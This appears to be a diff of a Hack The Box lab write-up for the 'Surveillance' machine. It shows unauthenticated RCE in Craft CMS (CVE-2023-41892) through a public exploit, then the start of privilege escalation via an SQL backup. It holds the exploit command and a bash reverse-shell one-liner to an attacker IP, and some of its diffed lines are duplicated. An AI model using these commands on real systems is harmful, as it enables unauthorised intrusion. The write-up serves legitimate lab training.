W1nz4c4r/W1nz4c4r.github.io/_posts/2024-05-17-htb-writeup-Survellance.md

 # FootHold

-I decided to check the page hosted in port 80, to see if i can find something else that can help us find out more about the CMS that we are working with .

 ![Alt text](/assets/images/htb-writeup-survellance/surv2.png)

-I look for possible vulnerabilities related to craft CMS and I found a possible CVE ([CVE-2023-41892](https://www.rapid7.com/db/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892/)); By reading at the page I can see that Craft CMS versions between **4.0.0-RC1 - 4.4.14** are vulnerable to unauthenticated Remote Code Execution
+Visiting the website on port 80, we identify the CMS version and discover a known vulnerability, ([CVE-2023-41892](https://www.rapid7.com/db/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892/)), which affects Craft CMS versions between **4.0.0-RC1 and 4.4.14**.
+This vulnerability allows for *unauthenticated remote code execution (RCE)*.

 * The vulnerability lies in how Craft CMS handles functionalities like *\GuzzleHttp\Psr7\FnStream* which allows for selective method invocation.
 An attacker can craft a specially crafted request that triggers this functionality and injects malicious code.
 This code could then be written to the system's log file.
 * Since Craft CMS parses the log files for certain purposes, the *injected code can be executed unintentionally*.
 This grants the attacker remote code execution capabilities.

-After doing some research you will be able to find a working exploit in [GitHub](https://github.com/Faelian/CraftCMS_CVE-2023-41892).
-I just execute the program and it gave me shell access as ***www-data***
+We find a working exploit on [GitHub](https://github.com/Faelian/CraftCMS_CVE-2023-41892).:

 ```bash
 python3 craft-cms.py http://surveillance.htb/
 ```

+Executing this exploit grants us shell access as `www-data`.

 ![Alt text](/assets/images/htb-writeup-survellance/surv3.png)

-Then i tried to stablish a better shell to not depend only on the exploit to have aceess to the box
+In order to stabilize the shell, I execute:

 ```bash
 bash -c 'bash -i >& /dev/tcp/10.10.14.13/443 0>&1'
 ```
+# Privilege Escalation to Matthew

-while enumerating the system we can see two users (other than root) Matthew & ZoneMinder.
-With our current user (www-data) I found a backup directory that contains a zip file which was interesting to me because it is SQL backup file could contain some credentials or configuration information.
+While enumerating the system we can see two users (other than root) Matthew & ZoneMinder.
+After looking around I find a backup directory containing a zip file which is containts SQL backup file:

 * **Path:**  /var/www/html/craft/storage/backups
+We transfer the file to our machine for inspection:

+while enumerating the system  With our current user (www-data) I found a backup directory that contains a zip file which was interesting.

 I send the file to my machine to inspect it.